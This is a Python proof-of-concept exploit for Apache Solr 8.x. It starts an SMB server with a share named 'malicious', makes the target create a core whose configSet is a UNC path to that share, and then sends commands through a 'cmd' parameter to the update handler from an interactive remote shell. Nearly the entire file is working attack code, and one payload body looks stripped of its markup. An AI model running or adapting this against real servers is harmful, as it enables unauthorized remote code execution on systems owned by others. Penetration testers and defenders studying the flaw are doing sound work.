#!/usr/bin/env python3
"""Proof-of-concept driver for Solr core creation from an SMB-hosted configSet.

The script serves the local ``files`` directory over SMB, asks a Solr server
to create a core whose ``configSet`` is a UNC path to that share, and then
posts to the new core's update handler with a ``cmd`` query parameter.

For use only against systems you are explicitly authorized to test.
"""
import requests
import time
import sys
import argparse
import random
import string
import threading
import socket
from pathlib import Path
from impacket import smbserver


def generate_random_chars(length=8):
    """Return ``length`` random lowercase letters and digits as one string."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))


def get_local_ip():
    """Return the local IP address used for outbound traffic.

    Falls back to ``"127.0.0.1"`` when the address cannot be determined.
    """
    try:
        # Connecting a UDP socket sends no packet; it only makes the OS pick
        # the outbound interface so getsockname() reports its address.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        return "127.0.0.1"


def start_smb_server(share_name="malicious", port=445):
    """Start an impacket SMB server in a daemon thread and return the thread.

    The share ``share_name`` (upper-cased) exposes the ``files`` directory
    relative to the current working directory. Startup errors are printed
    from the server thread and are not propagated to the caller.

    Args:
        share_name: Name of the share to register.
        port: TCP port the SMB server listens on.

    Returns:
        The started ``threading.Thread``.
    """
    def run_server():
        try:
            files_path = str(Path("files").absolute())

            # Create SMB server instance
            server = smbserver.SimpleSMBServer(listenAddress="0.0.0.0", listenPort=port)
            server.addShare(share_name.upper(), files_path)
            server.setSMB2Support(True)
            server.start()
        except Exception as e:
            # Thread boundary: report the failure instead of dying silently.
            print(f"[!] Error starting SMB server: {e}")

    # Start server in background thread
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()
    # Give the server thread a moment to bind before the caller proceeds.
    time.sleep(2)
    return server_thread


def create_solr_core(host, port, smb_host, share_name):
    """Ask Solr to create a core whose configSet is the SMB share.

    Sends a ``CREATE`` request to ``/solr/admin/cores`` with a randomly
    named core and ``configSet`` set to ``//smb_host/share_name``.

    Args:
        host: Solr server host.
        port: Solr server port.
        smb_host: Host of the SMB server holding the configSet.
        share_name: Share name on the SMB server.

    Returns:
        ``(True, core_name)`` when the JSON response has no ``error`` key,
        otherwise ``(False, None)``.
    """
    base_url = f"http://{host}:{port}"
    endpoint = "/solr/admin/cores"

    # Generate random core name
    core_name = f"exploit_core_{generate_random_chars()}"

    # UNC path to the SMB share
    malicious_configset = f"//{smb_host}/{share_name}"

    params = {
        '_': int(time.time() * 1000),
        'action': 'CREATE',
        'configSet': malicious_configset,
        'name': core_name,
        'wt': 'json'
    }

    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'application/json, text/plain, */*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'keep-alive'
    }

    try:
        print(f"[*] Sending core creation request to: {base_url}{endpoint}")
        response = requests.get(
            f"{base_url}{endpoint}",
            params=params,
            headers=headers,
            timeout=30
        )

        print(f"[*] Response Status Code: {response.status_code}")

        # Parse JSON response if possible
        try:
            json_response = response.json()
            if 'error' in json_response:
                print(f"[!] Error creating core: {json_response['error']}")
                return False, None
            else:
                print(f"[*] Core '{core_name}' created successfully!")
                return True, core_name
        except ValueError:
            print(f"[!] Non-JSON response: {response.text}")
            return False, None

    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False, None


def trigger_payload(host, port, core_name):
    """Post a document to the core's update handler, then open the shell.

    Sends one POST to ``/solr/<core_name>/update`` with ``cmd=whoami``. On
    HTTP 200 the interactive shell is started and, once it exits, ``True``
    is returned. Any other status or a request error returns ``False``.

    Args:
        host: Solr server host.
        port: Solr server port.
        core_name: Name of the core to post to.

    Returns:
        ``True`` on HTTP 200, ``False`` otherwise.
    """
    print("[*] Triggering payload execution")

    base_url = f"http://{host}:{port}"
    endpoint = f"/solr/{core_name}/update"

    # Simple document to trigger the update processor.
    # NOTE(review): this body is sent as application/xml but contains no XML
    # markup as it appears here; the tags may have been lost before review.
    # Confirm against the intended payload.
    payload_data = ''' exploit_trigger Exploit Trigger '''

    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36'
    }

    try:
        print(f"[*] Sending payload to: {base_url}{endpoint}")
        response = requests.post(
            f"{base_url}{endpoint}",
            data=payload_data,
            headers=headers,
            params={
                'wt': 'json',
                'cmd': 'whoami'
            },
            timeout=30
        )

        if response.status_code == 200:
            print("[*] Payload executed successfully!")
            # Start interactive shell after successful test
            interactive_shell(host, port, core_name)
            return True
        else:
            print("[!] Payload execution may have failed")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False


def execute_command(host, port, core_name, command):
    """Post to the core's update handler with ``cmd=command``.

    Args:
        host: Solr server host.
        port: Solr server port.
        core_name: Name of the core to post to.
        command: Value sent as the ``cmd`` query parameter.

    Returns:
        A 3-tuple ``(ok, result, raw)``. On success ``ok`` is ``True``,
        ``result`` is a dict with ``stdout``, ``stderr``, ``exit_code`` and
        ``status`` read from the JSON response (defaults ``''``, ``''``,
        ``0``, ``''``), and ``raw`` is the decoded JSON object. On failure
        ``ok`` is ``False``, ``result`` is an error string and ``raw`` is
        ``None``.
    """
    base_url = f"http://{host}:{port}"
    endpoint = f"/solr/{core_name}/update"
    payload_data = '{"add": {"doc": {"id": "interactive", "title": "Interactive"}}}'
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0'
    }

    try:
        resp = requests.post(
            f"{base_url}{endpoint}",
            data=payload_data,
            headers=headers,
            params={
                'wt': 'json',
                'cmd': command
            },
            timeout=30
        )
    except requests.exceptions.RequestException as e:
        return False, str(e), None

    if resp.status_code != 200:
        return False, f"HTTP {resp.status_code}", None

    try:
        data = resp.json()
    except ValueError:
        return False, "JSON parse failed", None

    # A JSON array or scalar has no .get(); report it the same way a
    # malformed body is reported.
    if not isinstance(data, dict):
        return False, "JSON parse failed", None

    result = {
        'stdout': data.get('stdout', ''),
        'stderr': data.get('stderr', ''),
        'exit_code': data.get('exit_code', 0),
        'status': data.get('status', ''),
    }
    return True, result, data


def interactive_shell(host, port, core_name):
    """Read commands from stdin and print each command's result.

    The loop ends on ``exit``/``quit``, on end-of-input (Ctrl-D or a closed
    stdin), or on Ctrl-C. Empty lines are ignored.

    Args:
        host: Solr server host.
        port: Solr server port.
        core_name: Name of the core commands are posted to.
    """
    while True:
        try:
            cmd = input("\nsolr> ").strip()
            if not cmd:
                continue
            if cmd.lower() in ('exit', 'quit'):
                print("[*] exiting shell...")
                break

            ok, result, raw = execute_command(host, port, core_name, cmd)
            if ok:
                print(f"[+] exit_code: {result['exit_code']}, status: {result['status']}")
                if result['stdout']:
                    print("--- stdout ---")
                    print(result['stdout'].rstrip())
                if result['stderr']:
                    print("--- stderr ---")
                    print(result['stderr'].rstrip())
            else:
                print(f"[!] command failed: {result}")
        except EOFError:
            # input() raises EOFError when stdin is closed; treat as "exit"
            # rather than crashing with a traceback.
            print("\n[*] exiting shell...")
            break
        except KeyboardInterrupt:
            print("\n[*] interrupted")
            break


def parse_args():
    """Parse command-line arguments and return the resulting namespace."""
    parser = argparse.ArgumentParser(
        description="Solr 8.x Exploit Chain - configSet core creation via SMB",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s 192.168.35.31
  %(prog)s 10.0.0.1 --port 8983
  %(prog)s 192.168.1.100 --smb-port 445 --smb-host 192.168.1.50
"""
    )

    parser.add_argument('target_host', help='Target Solr server IP address')
    parser.add_argument('--port', '-p', type=int, default=8983,
                        help='Solr server port (default: 8983)')
    parser.add_argument('--smb-host',
                        help='SMB server IP (default: auto-detect local IP)')
    parser.add_argument('--smb-port', type=int, default=445,
                        help='SMB server port (default: 445)')
    parser.add_argument('--share-name', default='malicious',
                        help='SMB share name (default: malicious)')

    return parser.parse_args()


def main():
    """Run the full sequence: SMB server, core creation, trigger.

    Returns:
        ``True`` when the core was created and the trigger request returned
        HTTP 200, ``False`` otherwise.
    """
    args = parse_args()

    print(f"[*] Target: {args.target_host}:{args.port}")

    smb_host = args.smb_host or get_local_ip()
    print(f"[*] SMB Server: {smb_host}:{args.smb_port}")
    print(f"[*] Share Name: {args.share_name}")

    try:
        # Start SMB server
        print(f"\n[*] Starting SMB Server on {smb_host}:{args.smb_port}")
        start_smb_server(args.share_name, args.smb_port)

        print("[*] Waiting for SMB server to start...")
        time.sleep(3)

        # Create the Solr core
        print("\n[*] Creating Solr Core")
        success, core_name = create_solr_core(args.target_host, args.port, smb_host, args.share_name)

        if not success:
            print("[!] Failed to create Solr core!")
            return False

        # Trigger payload execution
        print("\n[*] Triggering Payload")
        triggered = trigger_payload(args.target_host, args.port, core_name)

        # Keep SMB server running for a bit
        time.sleep(30)

        # Report the trigger outcome instead of unconditional success.
        return triggered

    except Exception as e:
        # Top-level boundary: report and signal failure to the caller.
        print(f"\n[!] Exploit failed: {e}")
        return False


if __name__ == "__main__":
    # Propagate success/failure to the shell as the process exit status.
    sys.exit(0 if main() else 1)